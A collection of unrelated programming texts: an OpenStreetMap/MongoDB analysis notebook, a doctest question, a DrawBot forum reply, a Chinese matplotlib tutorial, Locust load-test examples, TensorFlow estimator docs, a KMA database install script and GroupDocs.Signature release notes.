elif not key.find('addr') == 0:
if key not in node:
node[key] = value
else:
node["tag:" + key] = value
# Process nodes
for nd in element.iter('nd'):
if 'node_refs' not in node:
node['node_refs'] = []
node['node_refs'].append(nd.attrib['ref'])
return node
else:
return None
Now parse the XML, shape the elements, and write to a json file.
We're using BSON for compatibility with the date aggregation operators. There is also a Timestamp type in MongoDB, but use of this type is explicitly discouraged by the documentation.
import json
from bson import json_util
def process_map(file_in, pretty = False):
file_out = "{0}.json".format(file_in)
with open(file_out, "wb") as fo:
for _, element in ET.iterparse(file_in):
el = shape_element(element)
if el:
if pretty:
fo.write(json.dumps(el, indent=2, default=json_util.default)+"\n")
else:
fo.write(json.dumps(el, default=json_util.default) + "\n")
process_map(filename)
Overview of the Data
Lets look at the size of the files we worked with and generated.
import os
print 'The downloaded file is {} MB'.format(os.path.getsize(filename)/1.0e6) # convert from bytes to megabytes
The downloaded file is 50.66996 MB
print 'The json file is {} MB'.format(os.path.getsize(filename + ".json")/1.0e6) # convert from bytes to megabytes
The json file is 83.383804 MB
Plenty of Street Addresses
Besides dirty data within the addr:street field, we're working with a sizeable amount of data on street addresses. Here I will count the total number of nodes and ways that contain a tag child with k="addr:street"
osm_file = open(filename, "r")
address_count = 0
for event, elem in ET.iterparse(osm_file, events=("start",)):
if elem.tag == "node" or elem.tag == "way":
for tag in elem.iter("tag"):
if is_street_name(tag):
address_count += 1
address_count
8958
There are plenty of locations on the map that has their street addresses tagged. It looks like OpenStreetMap's community has collected a good amount of data for this area.
Working with MongoDB
The first task is to execute mongod to run MongoDB. There are plenty of guides to do this. On OS X, if you have mongodb installed via homebrew, homebrew actually has a handy brew services command.
To start mongodb:
brew services start mongodb
To stop mongodb if it's already running:
brew services stop mongodb
Alternatively, if you have MongoDB installed and configured already we can run a subprocess for the duration of the python session:
import signal
import subprocess
# The os.setsid() is passed in the argument preexec_fn so
# it's run after the fork() and before exec() to run the shell.
pro = subprocess.Popen('mongod', preexec_fn = os.setsid)
Next, connect to the database with pymongo
from pymongo import MongoClient
db_name = 'openstreetmap'
# Connect to Mongo DB
client = MongoClient('localhost:27017')
# Database 'openstreetmap' will be created if it does not exist.
db = client[db_name]
Then just import the dataset with mongoimport.
# Build mongoimport command
collection = filename[:filename.find('.')]
working_directory = '/Users/James/Dropbox/Projects/da/data-wrangling-with-openstreetmap-and-mongodb/'
json_file = filename + '.json'
mongoimport_cmd = 'mongoimport -h 127.0.0.1:27017 ' + \
'--db ' + db_name + \
' --collection ' + collection + \
' --file ' + working_directory + json_file
# Before importing, drop collection if it exists (i.e. a re-run)
if collection in db.collection_names():
print 'Dropping collection: ' + collection
db[collection].drop()
# Execute the command
print 'Executing: ' + mongoimport_cmd
subprocess.call(mongoimport_cmd.split())
Dropping collection: cupertino_california
Executing: mongoimport -h 127.0.0.1:27017 --db openstreetmap --collection cupertino_california --file /Users/James/Dropbox/Projects/da/data-wrangling-with-openstreetmap-and-mongodb/cupertino_california.osm.json
0
Investigating the Data
After importing, get the collection from the database.
cupertino_california = db[collection]
Here's where the fun stuff starts. Now that we have a audited and cleaned up collection, we can query for a bunch of interesting statistics.
Number of Documents
cupertino_california.find().count()
243046
Number of Unique Users
len(cupertino_california.distinct('created.user'))
528
Number of Nodes and Ways
cupertino_california.aggregate({'$group': {'_id': '$type', \
'count': {'$sum' : 1}}})['result']
[{u'_id': u'way', u'count': 28404}, {u'_id': u'node', u'count': 214642}]
Top Three Contributors
top_users = cupertino_california.aggregate([{'$group': {'_id': '$created.user', \
'count': {'$sum' : 1}}}, \
{'$sort': {'count' : -1}}, \
{'$limit': 3}])['result']
pprint.pprint(top_users)
print
for user in top_users:
pprint.pprint(cupertino_california.find({'created.user': user['_id']})[0])
[{u'_id': u'n76', u'count': 66090},
{u'_id': u'mk408', u'count': 37175},
{u'_id': u'Bike Mapper', u'count': 27545}]
{u'_id': ObjectId('55e69dc45c014321a5c76759'),
u'changeset': u'16866449',
u'created': {u'changeset': u'16866449',
u'timestamp': datetime.datetime(2013, 7, 7, 21, 29, 38),
u'uid': u'318696',
u'user': u'n76',
u'version': u'21'},
u'highway': u'traffic_signals',
u'id': u'26027690',
u'pos': [37.3531613, -122.0140663],
u'timestamp': u'2013-07-07T21:29:38Z',
u'type': u'node',
u'uid': u'318696',
u'user': u'n76',
u'version': u'21'}
{u'_id': ObjectId('55e69dc45c014321a5c76765'),
u'changeset': u'3923975',
u'created': {u'changeset': u'3923975',
u'timestamp': datetime.datetime(2010, 2, 20, 14, 28, 36),
u'uid': u'201724',
u'user': u'mk408',
u'version': u'2'},
u'id': u'26117855',
u'pos': [37.3584066, -122.016459],
u'timestamp': u'2010-02-20T14:28:36Z',
u'type': u'node',
u'uid': u'201724',
u'user': u'mk408',
u'version': u'2'}
{u'_id': ObjectId('55e69dc45c014321a5c76761'),
u'changeset': u'31215083',
u'created': {u'changeset': u'31215083',
u'timestamp': datetime.datetime(2015, 5, 17, 0, 1, 56),
u'uid': u'74705',
u'user': u'Bike Mapper',
u'version': u'25'},
u'id': u'26029632',
u'pos': [37.3523544, -122.0122361],
u'timestamp': u'2015-05-17T00:01:56Z',
u'type': u'node',
u'uid': u'74705',
u'user': u'Bike Mapper',
u'version': u'25'}
Three Most Referenced Nodes
top_nodes = cupertino_california.aggregate([{'$unwind': '$node_refs'}, \
{'$group': {'_id': '$node_refs', \
'count': {'$sum': 1}}}, \
{'$sort': {'count': -1}}, \
{'$limit': 3}])['result']
pprint.pprint(top_nodes)
print
for node in top_nodes:
pprint.pprint(cupertino_california.find({'id': node['_id']})[0])
[{u'_id': u'282814553', u'count': 9},
{u'_id': u'3567695709', u'count': 7},
{u'_id': u'3678198975', u'count': 7}]
{u'_id': ObjectId('55e69dc45c014321a5c7b228'),
u'changeset': u'32109704',
u'created': {u'changeset': u'32109704',
u'timestamp': datetime.datetime(2015, 6, 21, 5, 7, 49),
u'uid': u'33757',
u'user': u'Minh Nguyen',
u'version': u'19'},
u'highway': u'traffic_signals',
u'id': u'282814553',
u'pos': [37.3520588, -121.93721],
u'timestamp': u'2015-06-21T05:07:49Z',
u'type': u'node',
u'uid': u'33757',
u'user': u'Minh Nguyen',
u'version': u'19'}
{u'_id': ObjectId('55e69dca5c014321a5ca7eed'),
u'changeset': u'31682562',
u'created': {u'changeset': u'31682562',
u'timestamp': datetime.datetime(2015, 6, 3, 4, 56, 24),
u'uid': u'33757',
u'user': u'Minh Nguyen',
u'version': u'1'},
u'id': u'3567695709',
u'pos': [37.3354655, -121.9078015],
u'timestamp': u'2015-06-03T04:56:24Z',
u'type': u'node',
u'uid': u'33757',
u'user': u'Minh Nguyen',
u'version': u'1'}
{u'_id': ObjectId('55e69dca5c014321a5ca9881'),
u'changeset': u'33058613',
u'created': {u'changeset': u'33058613',
u'timestamp': datetime.datetime(2015, 8, 2, 23, 59, 13),
u'uid': u'33757',
u'user': u'Minh Nguyen',
u'version': u'1'},
u'id': u'3678198975',
u'pos': [37.327171, -121.9337872],
u'timestamp': u'2015-08-02T23:59:13Z',
u'type': u'node',
u'uid': u'33757',
u'user': u'Minh Nguyen',
u'version': u'1'}
Number of Documents with Street Addresses
cupertino_california.find({'address.street': {'$exists': 1}}).count()
9095
List of Zip Codes
cupertino_california.aggregate([{'$match': {'address.postcode': {'$exists': 1}}}, \
{'$group': {'_id': '$address.postcode', \
'count': {'$sum': 1}}}, \
{'$sort': {'count': -1}}])['result']
[{u'_id': u'94087', u'count': 226},
{u'_id': u'95070', u'count': 225},
{u'_id': u'95051', u'count': 127},
{u'_id': u'95014', u'count': 106},
{u'_id': u'95129', u'count': 86},
{u'_id': u'95126', u'count': 45},
{u'_id': u'95008', u'count': 41},
{u'_id': u'95050', u'count': 28},
{u'_id': u'95125', u'count': 13},
{u'_id': u'94086', u'count': 12},
{u'_id': u'95117', u'count': 9},
{u'_id': u'95128', u'count': 8},
{u'_id': u'94024', u'count': 5},
{u'_id': u'95124', u'count': 4},
{u'_id': u'94040', u'count': 3},
{u'_id': u'95032', u'count': 3},
{u'_id': u'94087-2248', u'count': 1},
{u'_id': u'94087\u200e', u'count': 1},
{u'_id': u'94088-3707', u'count': 1},
{u'_id': u'95110', u'count': 1},
{u'_id': u'95052', u'count': 1},
{u'_id': u'CA 95014', u'count': 1},
{u'_id': u'95914', u'count': 1},
{u'_id': u'94022', u'count': 1},
{u'_id': u'CA 94086', u'count': 1}]
It looks like have some invalid zip codes, with the state name or unicode characters included.
The zip codes with 4 digit postal codes included are still valid though, and we might consider removing these postal codes during the cleaning process.
Cities with Most Records
cupertino_california.aggregate([{'$match': {'address.city': {'$exists': 1}}}, \
{'$group': {'_id': '$address.city', \
'count': {'$sum': 1}}}, \
{'$sort': {'count': -1}}])['result']
[{u'_id': u'Sunnyvale', u'count': 2476},
{u'_id': u'Saratoga', u'count': 221},
{u'_id': u'Santa Clara', u'count': 142},
{u'_id': u'San Jose', u'count': 99},
{u'_id': u'Cupertino', u'count': 59},
{u'_id': u'Campbell', u'count': 37},
{u'_id': u'San Jos\xe9', u'count': 9},
{u'_id': u'Los Altos', u'count': 7},
{u'_id': u'Campbelll', u'count': 3},
{u'_id': u'Mountain View', u'count': 3},
{u'_id': u'cupertino', u'count': 2},
{u'_id': u'Santa clara', u'count': 1},
{u'_id': u'santa clara', u'count': 1},
{u'_id': u'campbell', u'count': 1},
{u'_id': u'san jose', u'count': 1},
{u'_id': u'Los Gatos', u'count': 1},
{u'_id': u'South Mary Avenue', u'count': 1},
{u'_id': u'sunnyvale', u'count': 1}]
Likewise, some cities capitalization and the accented-e gives way to more auditing and cleaning.
It's interesting to note how well Sunnyvale and Santa Clara have been documented, relative to the other cities despite having the area covering mostly Cupertino, Saratoga, West San Jose.
Top 10 Amenities
cupertino_california.aggregate([{'$match': {'amenity': {'$exists': 1}}}, \
{'$group': {'_id': '$amenity', \
'count': {'$sum': 1}}}, \
{'$sort': {'count': -1}}, \
{'$limit': 10}])['result']
[{u'_id': u'parking', u'count': 437},
{u'_id': u'restaurant', u'count': 279},
{u'_id': u'school', u'count': 243},
{u'_id': u'place_of_worship', u'count': 153},
{u'_id': u'fast_food', u'count': 147},
{u'_id': u'cafe', u'count': 85},
{u'_id': u'fuel', u'count': 79},
{u'_id': u'bicycle_parking', u'count': 72},
{u'_id': u'bank', u'count': 66},
{u'_id': u'bench', u'count': 60}]
* Top 10 Banks*
It's a pain when there isn't a local branch of your bank closeby. Lets what banks have the most locations in this area to avoid this.
cupertino_california.aggregate([{'$match': {'amenity': 'bank'}}, \
{'$group': {'_id': '$name', \
'count': {'$sum': 1}}}, \
{'$sort': {'count': -1}}, \
{'$limit': 10}])['result']
[{u'_id': u'Bank of America', u'count': 10},
{u'_id': u'Chase', u'count': 8},
{u'_id': None, u'count': 7},
{u'_id': u'US Bank', u'count': 5},
{u'_id': u'Citibank', u'count': 5},
{u'_id': u'Wells Fargo', u'count': 5},
{u'_id': u'First Tech Federal Credit Union', u'count': 2},
{u'_id': u'Union Bank', u'count': 2},
{u'_id': u'Bank of the West', u'count': 2},
{u'_id': u'Chase Bank', u'count': 2}]
Other Ideas About the Dataset
From exploring the OpenStreetMap dataset, I found the data structure to be flexible enough to include a vast multitude of user generated quantitative and qualitative data beyond that of simply defining a virtual map. There's plenty of potential to extend OpenStreetMap to include user reviews of establishments, subjective areas of what classifies a good vs bad neighborhood, housing price data, school reviews, walkability/bikeability, quality of mass transit, and a bunch of other metrics that could form a solid foundation for robust recommender systems. These recommender systems could aid users in deciding where to live or what cool food joints to check out.
The data is far too incomplete to be able to implement such recommender systems as it stands now, but the OpenStreetMap project could really benefit from visualizing data on content generation within their maps. For example, a heat map layer could be overlayed on the map showing how frequently or how recently certain regions of the map have been updated. These map layers could help guide users towards areas of the map that need attention in order to help more fully complete the data set.
Next I will cover a couple of queries that are aligned with these ideas about the velocity and volume of content generation
Amount of Nodes Elements Created by Day of Week
I will use the $dayOfWeek operator to extract the day of week from the created.timestamp field, where 1 is Sunday and 7 is Saturday:
cupertino_california.aggregate([{'$project': {'dayOfWeek': {'$dayOfWeek': '$created.timestamp'}}}, \
{'$group': {'_id': '$dayOfWeek', \
'count': {'$sum': 1}}}, \
{'$sort': {'_id': 1}}])['result']
[{u'_id': 1, u'count': 44247},
{u'_id': 2, u'count': 39205},
{u'_id': 3, u'count': 39398},
{u'_id': 4, u'count': 35923},
{u'_id': 5, u'count': 33127},
{u'_id': 6, u'count': 21174},
{u'_id': 7, u'count': 29972}]
It seems like users were more active on in the beginning of the week.
Age of Elements
Lets see how old elements were created in the XML using the created.timestamp field and visualize this data by pushing the calculated values into a list.
ages = cupertino_california.aggregate([ \
{'$project': {'ageInMilliseconds': {'$subtract': [datetime.now(), '$created.timestamp']}}}, \
{'$project': {'_id': 0, \
'ageInDays': {'$divide': ['$ageInMilliseconds', 1000*60*60*24]}}}, \
{'$group' : {'_id': 1, \
'ageInDays': {'$push': '$ageInDays'}}}, \
{'$project': {'_id': 0, \
'ageInDays': 1}}])['result'][0]
Now I have a dictionary with an ageInDays key and a list of floats as the value. Next, I will create a pandas dataframe from this dictionary
from pandas import DataFrame
age_df = DataFrame.from_dict(ages)
# age_df.index.name = 'element'
print age_df.head()
ageInDays0 1709.5541431 1709.5528932 1709.6757983 1709.6760184 1709.676331
Lets plot a histogram of this series with our best friend ggplot. The binwidth is set to 30 (about a month)
%matplotlib inline
from ggplot import *
import warnings
# ggplot usage of pandas throws a future warning
warnings.filterwarnings('ignore')
print ggplot(aes(x='ageInDays'), data=age_df) + \
geom_histogram(binwidth=30, fill='#007ee5')
<ggplot: (322176817)>
Note the rise and fall of large spikes of activity occurring about every 400 days. I hypothesize that these are due to single users making many edits in this concentrated map area in a short period of time.
|
injecting names into global namespace doesn't work with doctest
Here is a minimal example of the problem I am running into. I have a file "MyClass.py":
class MyClass(object):
def __init__(self,subscript):
self.subscript = subscript
def __repr__(self):
return "MyClass " + str(self.subscript)
def make_MyClass(n):
"""
Creates n MyClass instances and assigns them to to variables A0, ..., A(n-1).
Examples::
sage: make_MyClass(3)
sage: A0
MyClass 0
sage: A2
MyClass 2
sage: A1.subscript
1
"""
for i in range(n):
globals()["A" + str(i)] = MyClass(i)
If I doctest it, I get NameError: name 'A0' is not defined, but if I just load the file and type in the commands, it works how I want it to. It must be something about how globals() interacts with doctest.
I know it is possible to make this work, because for example the function var does something like this. I tried looking at the var.pyx source, but it looks like they are doing the same thing as me. (There is a comment about globals() being the reason that it had to be Cython. I tried making the example above a pyx, but that didn't seem to help.)
|
Typographic white space?
micahmicahlast edited by gferreira
Does DrawBot allow for utilizing whitespace characters such as
em,en, orthinspaces?
You just have to use the proper unicode and the font should of course support it:
# a collection of space unicodes
spaces = [
(0x0020, "normal space"),
(0x2000, "en space"),
(0x2001, "em space"),
(0x2008, "hair space"),
(0x2009, "thin space"),
(0x200B, "zero width space"),
]
y = 20
fontSize(60)
# start loop over all spaces
for space, name in spaces:
# draw the space as text
# using the py3 f-string formatting!!!
text(f"draw{chr(space)}bot\t\t({name})", (10, y))
y += 100
micahmicahlast edited by
@frederik wonderful! Thank you!
|
Subplot 分格显示
学习资料:
matplotlib 的 subplot 还可以是分格的,这里介绍三种方法.
subplot2grid ¶
使用import导入matplotlib.pyplot模块, 并简写成plt. 使用plt.figure()创建一个图像窗口
import matplotlib.pyplot as plt
plt.figure()
使用plt.subplot2grid来创建第1个小图, (3,3)表示将整个图像窗口分成3行3列, (0,0)表示从第0行第0列开始作图,colspan=3表示列的跨度为3, rowspan=1表示行的跨度为1. colspan和rowspan缺省, 默认跨度为1.
ax1 = plt.subplot2grid((3, 3), (0, 0), colspan=3)
ax1.plot([1, 2], [1, 2]) # 画小图
ax1.set_title('ax1_title') # 设置小图的标题
使用plt.subplot2grid来创建第2个小图, (3,3)表示将整个图像窗口分成3行3列, (1,0)表示从第1行第0列开始作图,colspan=2表示列的跨度为2.同上画出 ax3, (1,2)表示从第1行第2列开始作图,rowspan=2表示行的跨度为2. 再画一个 ax4 和 ax5, 使用默认 colspan, rowspan.
ax2 = plt.subplot2grid((3, 3), (1, 0), colspan=2)
ax3 = plt.subplot2grid((3, 3), (1, 2), rowspan=2)
ax4 = plt.subplot2grid((3, 3), (2, 0))
ax5 = plt.subplot2grid((3, 3), (2, 1))
使用ax4.scatter创建一个散点图, 使用ax4.set_xlabel和ax4.set_ylabel来对x轴和y轴命名.
ax4.scatter([1, 2], [2, 2])
ax4.set_xlabel('ax4_x')
ax4.set_ylabel('ax4_y')
gridspec ¶
使用import导入matplotlib.pyplot模块, 并简写成plt.使用import导入matplotlib.gridspec, 并简写成gridspec.
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
使用plt.figure()创建一个图像窗口, 使用gridspec.GridSpec将整个图像窗口分成3行3列.
plt.figure()
gs = gridspec.GridSpec(3, 3)
使用plt.subplot来作图, gs[0, :]表示这个图占第0行和所有列, gs[1, :2]表示这个图占第1行和第2列前的所有列, gs[1:, 2]表示这个图占第1行后的所有行和第2列, gs[-1, 0]表示这个图占倒数第1行和第0列, gs[-1, -2]表示这个图占倒数第1行和倒数第2列.
ax6 = plt.subplot(gs[0, :])
ax7 = plt.subplot(gs[1, :2])
ax8 = plt.subplot(gs[1:, 2])
ax9 = plt.subplot(gs[-1, 0])
ax10 = plt.subplot(gs[-1, -2])
subplots ¶
使用plt.subplots建立一个2行2列的图像窗口,sharex=True表示共享x轴坐标, sharey=True表示共享y轴坐标. ((ax11, ax12), (ax13, ax14))表示第1行从左至右依次放ax11和ax12, 第2行从左至右依次放ax13和ax14.
f, ((ax11, ax12), (ax13, ax14)) = plt.subplots(2, 2, sharex=True, sharey=True)
使用ax11.scatter创建一个散点图.
ax11.scatter([1,2], [1,2])
plt.tight_layout()表示紧凑显示图像, plt.show()表示显示图像.
plt.tight_layout()
plt.show()
|
A "locustfile" is the description of the load test to run - what URLs to hit, what data to send, what weights and priorities to give and more. We provide several examples here.
Our default locustfile is to get the index page of the host (/) with a simulated user wait time of between 5 and 9 seconds per request.
from locust import HttpUser, task, between
class QuickstartUser(HttpUser):
wait_time = between(5, 9)
@task(1)
def index_page(self):
self.client.get("/")
The below example requests an index page, and then a CSS, JS, and image file as well. You'll see the image request has a custom weight (@task(4)) to make it request 4x more images.
from locust import HttpUser, task, between
class QuickstartUser(HttpUser):
wait_time = between(5, 9)
@task(1)
def index_page(self):
self.client.get("/")
self.client.get("/app.js")
self.client.get("/app.css")
@task(4)
def image_selection(self):
self.client.get("/images/logo.jpg")
Below you can see a test which posts to a login page when it starts, then requests /hello and /world normally. It also requests /item?id={item_id} with the item ID being between 1 and 10. You can also use random numbers in locustfiles.
import time
from locust import HttpUser, task, between
class QuickstartUser(HttpUser):
wait_time = between(3, 5)
@task
def index_page(self):
self.client.get("/hello")
self.client.get("/world")
@task(3)
def view_item(self):
for item_id in range(10):
self.client.get(f"/item?id={item_id}", name="/item")
time.sleep(1)
def on_start(self):
self.client.post("/login", json={"username":"foo", "password":"bar"})
Below is a snippet that allows you to test, for example, that the webserver actually returns a 404 not found.
with self.client.get("/does_not_exist/", catch_response=True) as response:
if response.status_code == 404:
response.success()
Here we can see a snippet that checks for the word "Success" in a response, and then generates a failure if its taken more than half a second to reply.
with self.client.get("/", catch_response=True) as response:
if response.text != "Success":
response.failure("Got wrong response")
elif response.elapsed.total_seconds() > 0.5:
response.failure("Request took too long")
Sometimes you want to test the maximum requests per second your webservers can deliver, as opposed to the dynamic content your application can - e.g. php, Laravel, etc.
To do that you can request only static content from the webserver, or even a very small static text file.
Here is an example with an image and robots.txt:
from locust import HttpUser, task, between
class QuickstartUser(HttpUser):
wait_time = between(4, 7)
@task(1)
def robots_fetch(self):
self.client.get("/robots.txt")
@task(1)
def image_selection(self):
self.client.get("/images/logo.jpg")
|
TensorFlow 1 version View source on GitHub
Train and evaluate the estimator.
tf.estimator.train_and_evaluate( estimator, train_spec, eval_spec)
Used in the notebooks
Used in the guide Used in the tutorials
This utility function trains, evaluates, and (optionally) exports the model byusing the given estimator. All training related specification is held intrain_spec, including training input_fn and training max steps, etc. Allevaluation and export related specification is held in eval_spec, includingevaluation input_fn, steps, etc.
This utility function provides consistent behavior for both local (non-distributed) and distributed configurations. The default distribution configuration is parameter server-based between-graph replication. For other types of distribution configurations such as all-reduce training, please use DistributionStrategies.
Overfitting: In order to avoid overfitting, it is recommended to set up thetraining input_fn to shuffle the training data properly.
Stop condition: In order to support both distributed and non-distributedconfiguration reliably, the only supported stop condition for modeltraining is train_spec.max_steps. If train_spec.max_steps is None, themodel is trained forever. Use with care if model stop condition isdifferent. For example, assume that the model is expected to be trained withone epoch of training data, and the training input_fn is configured to throwOutOfRangeError after going through one epoch, which stops theEstimator.train. For a three-training-worker distributed configuration, eachtraining worker is likely to go through the whole epoch independently. So, themodel will be trained with three epochs of training data instead of one epoch.
Example of local (non-distributed) training:
# Set up feature columns.
categorial_feature_a = categorial_column_with_hash_bucket(...)
categorial_feature_a_emb = embedding_column(
categorical_column=categorial_feature_a, ...)
... # other feature columns
estimator = DNNClassifier(
feature_columns=[categorial_feature_a_emb, ...],
hidden_units=[1024, 512, 256])
# Or set up the model directory
# estimator = DNNClassifier(
# config=tf.estimator.RunConfig(
# model_dir='/my_model', save_summary_steps=100),
# feature_columns=[categorial_feature_a_emb, ...],
# hidden_units=[1024, 512, 256])
# Input pipeline for train and evaluate.
def train_input_fn(): # returns x, y
# please shuffle the data.
pass
def eval_input_fn(): # returns x, y
pass
train_spec = tf.estimator.TrainSpec(input_fn=train_input_fn, max_steps=1000)
eval_spec = tf.estimator.EvalSpec(input_fn=eval_input_fn)
tf.estimator.train_and_evaluate(estimator, train_spec, eval_spec)
Note that in current implementation estimator.evaluate will be calledmultiple times. This means that evaluation graph (including eval_input_fn)will be re-created for each evaluate call. estimator.train will be calledonly once.
Example of distributed training:
Regarding the example of distributed training, the code above can be usedwithout a change (Please do make sure that the RunConfig.model_dir for allworkers is set to the same directory, i.e., a shared file system all workerscan read and write). The only extra work to do is setting the environmentvariable TF_CONFIG properly for each worker correspondingly.
Also see Distributed TensorFlow.
Setting environment variable depends on the platform. For example, on Linux,it can be done as follows ($ is the shell prompt):
$ TF_CONFIG='<replace_with_real_content>' python train_model.py
For the content in TF_CONFIG, assume that the training cluster spec lookslike:
cluster = {"chief": ["host0:2222"],
"worker": ["host1:2222", "host2:2222", "host3:2222"],
"ps": ["host4:2222", "host5:2222"]}
Example of TF_CONFIG for chief training worker (must have one and only one):
# This should be a JSON string, which is set as environment variable. Usually
# the cluster manager handles that.
TF_CONFIG='{
"cluster": {
"chief": ["host0:2222"],
"worker": ["host1:2222", "host2:2222", "host3:2222"],
"ps": ["host4:2222", "host5:2222"]
},
"task": {"type": "chief", "index": 0}
}'
Note that the chief worker also does the model training job, similar to other non-chief training workers (see next paragraph). In addition to the model training, it manages some extra work, e.g., checkpoint saving and restoring, writing summaries, etc.
Example of TF_CONFIG for non-chief training worker (optional, could bemultiple):
# This should be a JSON string, which is set as environment variable. Usually
# the cluster manager handles that.
TF_CONFIG='{
"cluster": {
"chief": ["host0:2222"],
"worker": ["host1:2222", "host2:2222", "host3:2222"],
"ps": ["host4:2222", "host5:2222"]
},
"task": {"type": "worker", "index": 0}
}'
where the task.index should be set as 0, 1, 2, in this example, respectivelyfor non-chief training workers.
Example of TF_CONFIG for parameter server, aka ps (could be multiple):
# This should be a JSON string, which is set as environment variable. Usually
# the cluster manager handles that.
TF_CONFIG='{
"cluster": {
"chief": ["host0:2222"],
"worker": ["host1:2222", "host2:2222", "host3:2222"],
"ps": ["host4:2222", "host5:2222"]
},
"task": {"type": "ps", "index": 0}
}'
where the task.index should be set as 0 and 1, in this example, respectivelyfor parameter servers.
Example of TF_CONFIG for evaluator task. Evaluator is a special task that isnot part of the training cluster. There could be only one. It is used formodel evaluation.
# This should be a JSON string, which is set as environment variable. Usually
# the cluster manager handles that.
TF_CONFIG='{
"cluster": {
"chief": ["host0:2222"],
"worker": ["host1:2222", "host2:2222", "host3:2222"],
"ps": ["host4:2222", "host5:2222"]
},
"task": {"type": "evaluator", "index": 0}
}'
When distribute or experimental_distribute.train_distribute andexperimental_distribute.remote_cluster is set, this method will start aclient running on the current host which connects to the remote_cluster fortraining and evaluation.
Args
estimator An Estimator instance to train and evaluate.
train_spec A TrainSpec instance to specify the training specification.
eval_spec A EvalSpec instance to specify the evaluation and exportspecification.
Returns
A tuple of the result of the evaluate call to the Estimator and theexport results using the specified Exporters.Currently, the return value is undefined for distributed training mode.
Raises
ValueError if environment variable TF_CONFIG is incorrectly set.
|
My directory folderMarket has lots of files with the same name but are tagged with a date string at the end. The date tag can be formatted differently, e.g. "2018-07-25" or "25Jul18". My helper function is tasked with extracting a path list matching each found file name against filename_list. is there a better way to build a filename_list instead of brute force used below?
from datetime import datetime
strToday = "2018-07-25"
files_market = ['apples_DATE.xml', 'peaches_DATE.xml', 'cucumbers_DATE.xml', 'potatos_DATE.xml', 'tomates.DATE.csv']
def get_path_list(directory, base_filename_list, savedAsOf):
strDate1 = savedAsOf
filename_list1 = [n.replace('DATE', strDate1) for n in base_filename_list]
strDate2 = datetime.strptime(savedAsOf, '%Y-%m-%d').strftime('%d%b%y')
filename_list2 = [n.replace('DATE', strDate2) for n in base_filename_list]
filename_list = filename_list1 + filename_list2
path_list = []
for file in os.listdir(directory):
filename = os.fsdecode(file)
if filename in filename_list:
path_list.append(os.path.join(directory, filename))
continue
return path_list
print (len(get_path_list(folderMarket, files_market, strToday)))
|
#!/usr/bin/python3
import shutil
import os
import sys
import tempfile
import subprocess
# TODO:
# Make script independent of current working directory
# Make script able to store indexed files in a directory not named
# 'kma_indexing'
# This scripts installs the PointFinder database for using KMA
# KMA should be installed before running this script
# The scripts assumes that it is placed together with the ResFinder species
# directories
#
# First clone the repository:
# git clone https://bitbucket.org/genomicepidemiology/resfinder_db.git
# Check if executable kma_index program is installed, if not promt the user for
# path
# Function for easy error printing
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
# KMA version
KMA_VERSION = "1.0.1"
interactive = True
if len(sys.argv) >= 2:
kma_index = sys.argv[1]
if "non_interactive" in sys.argv:
interactive = False
else:
kma_index = "kma_index"
print(str(sys.argv))
while shutil.which(kma_index) is None:
eprint("KMA index program, {}, does not exist or is not executable"
.format(kma_index))
ans = None
if(interactive):
ans = input("Please input path to executable kma_index program or"
"choose one of the options below:\n"
"\t1. Install KMA using make, index db, then remove KMA.\n"
"\t2. Exit\n")
if(ans == "2" or ans == "q" or ans == "quit" or ans == "exit"):
eprint("Exiting!\n\n"
"Please install executable KMA programs in order to install"
"this database.\n\n"
"KMA can be obtained from bitbucked:\n\n"
"git clone -b {:s} "
"https://bitbucket.org/genomicepidemiology/kma.git"
.format(KMA_VERSION))
sys.exit()
if(ans == "1" or ans is None):
if(shutil.which("git") is None):
sys.exit("Attempt to automatically install KMA failed.\n"
"git does not exist or is not executable.")
org_dir = os.getcwd()
# Create temporary directory
tempdir = tempfile.TemporaryDirectory()
os.chdir(tempdir.name)
try:
subprocess.run(
["git", "clone", "-b", KMA_VERSION,
"https://bitbucket.org/genomicepidemiology/kma.git"],
check=True)
os.chdir("kma")
except subprocess.CalledProcessError:
eprint("Installation in temporary directory with make failed "
"at the git cloning step")
os.chdir(org_dir)
try:
subprocess.run(["make"])
except subprocess.CalledProcessError:
eprint("Installation in temporary directory with make failed "
"at the make step.")
os.chdir(org_dir)
kma_index = "{}/kma/kma_index".format(tempdir.name)
os.chdir(org_dir)
if shutil.which(kma_index) is None:
eprint("Installation in temporary directory with make failed "
"at the test step.")
os.chdir(org_dir)
kma_index = "kma_index"
if(not interactive):
ans = "2"
if(ans is not None and ans != "1" and ans != "2"):
kma_index = ans
if shutil.which(kma_index) is None:
eprint("Path, {}, is not an executable path. Please provide "
"absolute path\n".format(ans))
# Index databases
# Use config_file to go through database dirs
config_file = open("config", "r")
for line in config_file:
if line.startswith("#"):
continue
else:
line = line.rstrip().split("\t")
drug = line[0].strip()
# for each dir index the fasta files
os.system("{0} -i {1}.fsa -o ./{1}".format(kma_index, drug))
os.system("{0} -i *.fsa -o ./all".format(kma_index))
config_file.close()
eprint("Done")
|
GroupDocs.Signature for Java 20.3 Release Notes
Major Features
With this release we are glad to announce updated signature objects life cycle and entire different process methods for Signature class. Now Signature class supponew public constructorrts classic CRUD (Create-Read-Update-Delete) operations set.
Signmethodcreatessignatures inside document and returns them as result with all properties along with new signature identifier property;
Searchmethodreadsa list of existing document signatures;
Updatemethodmodifiesexisting document signature(s) by identifier and stores changes in the same document;
Deletemethod removes signature(s) from the document.
Here are few concepts that will help to understand changes in this release more precisely:
Signprocess returns list of newly created signatures (as list of BaseSignature objects); When signing metadata layer is created inside the document to keep all signatures information: total signatures quantity, signature properties like unique identifier, location, size etc.;
BaseSignatureclass was extended with **SignatureId **string property that represents unique signature identifier inside the document;
BaseSignatureclass boolean property **IsSignature **was added to distinct signatures and native document components like text / images / barcodes / qr-codes etc.
All changes described above allows to hide signatures for document preview and exclude non signatures upon search.
The most notable changes:
Legacy API was removed from product.
Retrieve collection of created signatures after signing document;
Added signature identifier to distinct them in document;
Implemented an ability to search for signatures only and exclude other document content from search;
Introduced an ability to hide signatures from document preview;
Implemented an ability to modify existing document signatures;
Added a feature to remove signatures from document;
Fixed few bugs.
Different signature type classes were updated with ability to compare and clone.
Fix known limitation with unsupported digital signatures for Spreadsheet documents under .Net Standard 2.0
Full List of Issues Covering all Changes in this Release
Key Summary Issue Type
SIGNATURENET-2453 Implement ability to search only for signatures marked as IsSignature New Feature
SIGNATURENET-2426 Implement result of Sign method as SignResult class with newly created signatures list New Feature
SIGNATURENET-2394 Implement ability to hide signatures from Document Preview New Feature
